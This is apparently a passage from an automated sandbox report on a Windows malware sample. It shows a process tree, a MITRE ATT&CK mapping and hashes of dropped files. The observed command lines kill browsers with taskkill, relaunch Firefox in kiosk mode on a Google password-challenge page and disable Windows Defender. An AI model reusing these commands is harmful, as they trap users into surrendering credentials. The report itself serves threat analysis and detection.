- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ed744ee6-0b74-45eb-a102-25d84dc7f1a1} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {ee7d93b8-c12c-47ea-a019-19b09a36911e} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:3056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25164 -prefMapHandle 3832 -prefMapSize 270279 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {1e67f631-8600-43d5-adac-0e0b30657a7d} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:2808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4024 -prefsLen 27276 -prefMapHandle 4028 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {c05631c2-b39c-4df6-b609-3d888183b3b3} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4408 -prefsLen 34775 -prefMapHandle 4412 -prefMapSize 270279 -jsInitHandle 4416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4424 -initialChannelId {2f22d7fe-073a-45a9-8cd4-18d98c65a37e} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:4464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4900 -prefsLen 35012 -prefMapHandle 4932 -prefMapSize 270279 -ipcHandle 4968 -initialChannelId {50a6d90b-8a1b-4a8c-bf43-0975296ecf1c} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:5296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5328 -prefsLen 32952 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {624c596d-1a98-475e-ba26-d21de8ecc085} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:5012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5452 -prefsLen 32952 -prefMapHandle 5456 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5524 -initialChannelId {60bfabe9-6647-4a65-b163-5016e131a865} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:3184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5836 -prefsLen 32952 -prefMapHandle 5840 -prefMapSize 270279 -jsInitHandle 5844 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5852 -initialChannelId {52100647-0a33-4509-9451-eab14508b2b8} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:3556
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381690101\72ed6b8663.exe"C:\Users\Admin\AppData\Local\Temp\10381690101\72ed6b8663.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\10381700101\98d889d34a.exe"C:\Users\Admin\AppData\Local\Temp\10381700101\98d889d34a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5772
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5268
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\activity-stream.discovery_stream.json.tmp
Filesize24KB
MD5c81d306774ba677e29e24c0b3164d7d6
SHA1027477a4ce62b835c25ad4f97f66182af04d53ce
SHA2560520ebe0748e97e568dc89096fa19146ffce452fc65cb0f8913e4dd467602039
SHA512e52fb9cbaff0f831248d043dd3ace00a68ca324d18ae4a8081bdeb09c7ff844a7c2181237a97591fb5ba3bbfffcd7f547f9198fe27d7c7b959e7f11d8f443e66
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD5ae8bf22200b0bdb9a5e81c36c817ac90
SHA1caf9162df7d8c5c7352db88e896cfb6eec32bd99
SHA256a0a8e0fe823df407d4d11521fec9fa92ed3b7439b52411de131f4edcb74e53ff
SHA51267e1cf13420f089851288735e9e112cf9c2ae5f9b86a763082be234b95c6fd1a04ae35e170e2a7400f97ef74851f6a7cec7e5d848754ef5236bfcfe2bc90d634
-
Filesize
1.8MB
MD589431b16b25281a50a173f359ecbcebf
SHA1a5931bc59fd615f199461eb009262d26ff34c814
SHA25678d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e
SHA512498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2
-
Filesize
2.9MB
MD587e1ef76fcf8436dd835e12c500e4e83
SHA1e639e7352e4a21263120988a318f5e9b3dd8a275
SHA256357019ac110c232d6ee370d8ef02822c5963e72584ec7f897381679fe7ab38da
SHA512ab8e05c697f8f332c847e6661623b8f08d0adbbd8e5860accb2a608d1b896c031ea4b840cff4332637710e755108442fa9533375cfb1ec8164958e48acc1ccf3
-
Filesize
1.7MB
MD55dd55b0c5021bf7a1abd5dcff2598695
SHA1d523df50545388ae0465ed4ef58e05c387b38d8d
SHA256143fa09fc53e1bd7eb74d005c66f39a90b87901b69b6ea3209e4c33cf7b70f0c
SHA512a36dd71d4b48a30f0ef92bbbe59d9f1accfe152b7fec9c4f1a3896485bed084963821b5e6cb975bdd69ad3b867ed9c497733583f2e04f0617ebb2d6daef8670b
-
Filesize
950KB
MD5abb7738b0d8041d72718a0358da1d866
SHA16f0a0aeccbab99ab5e06819e48c0a5761e42a1ab
SHA25677b0911b9840fed6e2bb625e00e221adc5b5868198b4916303675154b4b81d5e
SHA51269097dd3019455023f0b142d65ae68525b372e0960d0e9995340ef736461582e459608475b361cb47d97055cc7cbc88642b55f6966ec6461289f92a6406bc0c9
-
Filesize
1.7MB
MD5c5531ef7f8f5936fbaef26e92eff6586
SHA1b29d02e373485971da8fba4093d5b2ecc711b07c
SHA256235dad4176b568a8137525842b7da13817e7685b83b9970839b1c67b8f732c1f
SHA512dc00c684f0f4c5db6c2f3c73fb8906c596c6efa008149b9a8c9db08ec6fc07a9fb409d3d0fc70132032a3f2d58e127d897cdc8005e2da297b221da03b7d27a6f
-
Filesize
1.8MB
MD5242617c7d9c922457ad4ea64cb40f6ea
SHA19725d4a1e476d9fb9d3e0b495fa4796b250470ba
SHA256f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2
SHA512f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD5db47df109a7599f531b3b4b6984807f2
SHA1e8c017c7297afc74afb0d4f34cc6fd21ac610f00
SHA2566fb5311d74c5c3d59ac18367e658baa8cfc7449f4900ca77b4b2cf153f482c9c
SHA51248c17eff96631f518ed34d095a8abd6db675034ba7eb0dc5c510d0eb21d5a67f9abadbf614085793443a3a0d68a42cdf26508be6519e53cde4869738a0dbf807
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize8KB
MD5c3d43c4f27c0e4625fff4c568ba0afb4
SHA11ccc441674631f33c7112384590579a47e3f4e06
SHA2563074d6c7cd893725ebe30faa24d53549da36f202460c147cf7090bd946db9abc
SHA512249b050750cd5d3fa0c314cb8db1782dcbef2b036ad0e5685090dc24b7ba24cab7549f6f9c6f0192aedbbf7a3810e7ee473be626f34380edffaa173f74a70fe2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize17KB
MD5f8338d126476db878bf659821f3284bf
SHA1ca480d42a763b1d6232695c43cd2056f3c537370
SHA2565c628bb76ff310aad6d8d0833127e0270ee8523afdd95c2cd201fac030cf6c38
SHA512cfbf22ba1ec6780ce3a88e4a1c03db00f76a3d2db4e75499e736c137724e3a128e48d36bd70a11231001de7f0241a55597742dc1c3979df459c4e35ec3aa7720
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5c747e7ccc86a9ae285d05e4dbb86ba2f
SHA14b5a3a8890b30e62065bc861c657aacd1b89c1be
SHA25668bfb6799186f7bf8cf2fd66e8401219e803f4b78243d484b01f25787a8b461a
SHA512d23738b6c58e40e9e5fd95b3db3c366678ac56d49c6f74d41b653a1e22b2e235f60eb3135dffb2d6333f57248479963d5d118f326ad27f9a97f58a1262f0df2a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\events\events
Filesize1KB
MD5e80f52887653f73b73c7e4ca8fbc23ee
SHA13859d607109252475a156df84d0e77c869fb2e9a
SHA25638da49b2a564289acbc1f8f7185e50d44186b497b8bd4203e221403e7fce2cd9
SHA512c863fd3db1a72d43b56a93748dbf0f6e1d9ba98efeb2ab38ab651412c860b5da8938d84c068e36d8f16bd6e4fbd078d6d0f0eee5e07e531a1268bac53f936674
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\141076cc-b8d6-4e04-847d-35da8dd9c9f6
Filesize2KB
MD59263f4d9070a7a440889645897be2ce4
SHA12211b09c22753da84d3b4677472963fed55e2606
SHA2560b0cec3601987dac787e5c23c358892c7b97de567a0e4e4b78f553b9b8d8dee0
SHA512141c55bc520296b68006978b52db6986ce7c9df2acd5cc56e0b11e1d06941d37b981a192f2d2c81295be332db7d6a1339a335728d06b3336bd4fcc67159bc3a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\1f1f93e2-8bad-4a0d-975c-b3d15de53e05
Filesize883B
MD5fb356a57c7433c401371aa4149dbaf5c
SHA1c8e83b9f1859c9e96b328d0a39966a570e366080
SHA256fd36963458c97dff12d9b19bbe3a61ab248b8ff1b7f408e10f5e34b2d194af02
SHA5122bb7f010c0c045d1a1b66c62de587cfbbc2cc2918b3ad831f4ce6848a567dca328418ed75b9152350ac595935b9baf3649197efc8531b226033f53264fa77d45
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\2069246d-a9c8-4c22-b1fe-52f84cce1948
Filesize16KB
MD50b5c2b2d86bad313f42d7ad77243dbbc
SHA1fa8db3db31b2a83ff9ff30ea3270b05c4a0041f8
SHA25639af6784b42d24a1fdd50987c96f78ef3529694378de54b49f52b4ff195c8323
SHA512c3cde5375fa4109a6079d0e023881c930fa0df7c0e1d82ea812ccfc80ba36847de6a31e192c081d9a871ff3c17a93d10339a33a4d81a64253f096df6c298a43c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\2a3439f4-224f-4f89-bb97-30049f5f9b33
Filesize235B
MD51bb4395c4d428798568a3525b3f902f7
SHA186330e2614537a1cf0d70d9c24a43ff4ffa6a8db
SHA256ae4602687c659202d2736fc7b2370c877885ae738dec9f376d5afcb0e5606f4b
SHA512d6ec3e95930aa73f4272d8602f7970647c2aee2a09755c9686e03dda4d6fe83a765b711428009402cfcdb1f806f776ff44ea91998cd13f114f7634329551f985
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\735771e9-f2f0-4530-b815-a36b556c568b
Filesize886B
MD5be681fe83e7fb935ffdde348211af7aa
SHA11fa7bd25896f447630c8287f5cce556685480fdd
SHA2563ed01d31724e580b1b4c691b688f4702cffbbe19f9efc76059e8dbcef0fe0a80
SHA512c6c4b1aa953f41c610e18148c7e56bc6f5ce2e1db4a8dce85c6b8a8fe7ac5d5db390f9c204795ab70bc30909bf2a3c7d74a89075eb5f5032794a208ba8011be6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\b0635795-a763-4abc-a336-0fd165d4a0f0
Filesize235B
MD51cf4057d56d1d99bfdb742f3db2d006b
SHA1832fd2bf851a70cb05f787debe8a00035ad60c49
SHA2566cd528d62ea6a66c4a88ae056d06566f08edc377cd0a552203c8a74f1b9ce2ff
SHA512677c76af5dcde1ce5b2e1e4c12bb1bac97df2e812d7e066f1ec016013641f7120a318df758b724c53248aaad4dfefbad1c903893ec2cc9f20e7e03c83939730e
-
Filesize
16KB
MD5c7f42858f29c388c5a59af9092b881ee
SHA1c1a8f5c509422d2d4c6e115627681f991795f650
SHA256d1b9020f9e397a6565fccf25ab5fb0d7566dc97792aba42c1694668d520f10d6
SHA5123f40a0e499eaa7535efd4f054d970ac4dfc07cbf310708fc6535498768ad65c387c3496cf8bb83609a8d02a3df02fd9dd686885c3953880ed1d66bdcd3a94c79
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD506042321255eea37035a46dc253dab61
SHA1a1129ecfa41a2324fb84e06f07437d90c2df0960
SHA25603a592e8073b8a71eb7bf92bb9b5e0378b513676c51dfb088c5e8dd36c3511ac
SHA512d2933588fb97db5e498b89e86ead0ec1bd78e927cdb498e54b86ee590ead2520fdddb39eae082d2f4ecdd6e0c402fe1f7da78c1f9ca6ecc561e7d476312eb86d
-
Filesize
8KB
MD58350154b308d9b677e3a1049a78d6ae4
SHA1d618cdac57f29c900272aeb66205f8f128d06a05
SHA25646573a8bff4f7452a7c5b2e75229d75e6314c65067320476f77d68de20f46e46
SHA5125e4c451a70ccac6e169d415cb3691bf69bdf5ef8dd4fe2cb2036943c2c36d09f5f8e6c02289158b4999e9f1ab902de809d9962659480449627c5c7d9818cfbab
-
Filesize
6KB
MD516b06ecc3b58a85b3d6f0b77dee022cb
SHA149957896a85c4a1d31e27fec7cb0f3749b91b49e
SHA256a359aa4e12cd5efb9bae959a55dd11cfba05dc7191d93614ba8e8f73e38563eb
SHA51233cb8b975721f26a3f205a990a9488371f1c94c6bd0adee37328d1ac407523f3fe3b64b5e5bfabb3291f0dab1e7663d5a72ecb2c052e301030783af1af6c22b3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5fd1e51887c40e96ac21adedafc406aa5
SHA164bb50e185819371c9cf87e9a4a30d481f0958bc
SHA256e66c8deb9919614518c048032640647a093d47def7fdd27d6b851dc4d4e81583
SHA51262cf2f668139b925c4f13c8b6aaefe6c8e4b683dbccd6c95bdeb3bbcfac7159793c6a1ff2f45c50803c0841a434ea5fe12a7a22eaf0d88109f6f68d2ee4d3dc0